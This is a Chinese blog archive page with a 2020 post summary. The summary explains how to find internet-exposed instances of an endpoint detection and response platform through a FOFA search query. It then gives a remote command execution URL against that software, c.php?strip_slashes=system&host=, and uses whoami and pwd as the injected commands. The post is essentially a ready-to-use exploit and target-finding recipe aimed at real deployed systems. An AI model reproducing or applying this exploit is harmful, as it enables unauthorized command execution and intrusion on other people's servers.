2020 年 9月 30 日随笔档案 - 不想长大a

2020年9月30日

摘要：先用fofa找到一个有漏洞的链接 body="终端检测响应平台" 漏洞利用 https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 修改id值为执行的命令使用whoami查询当前用户权限使用pwd查询当前所在目录查看当阅读全文

posted @ 2020-09-30 14:53 不想长大a 阅读(564) 评论(0) 推荐(0) 编辑

不想长大a

公告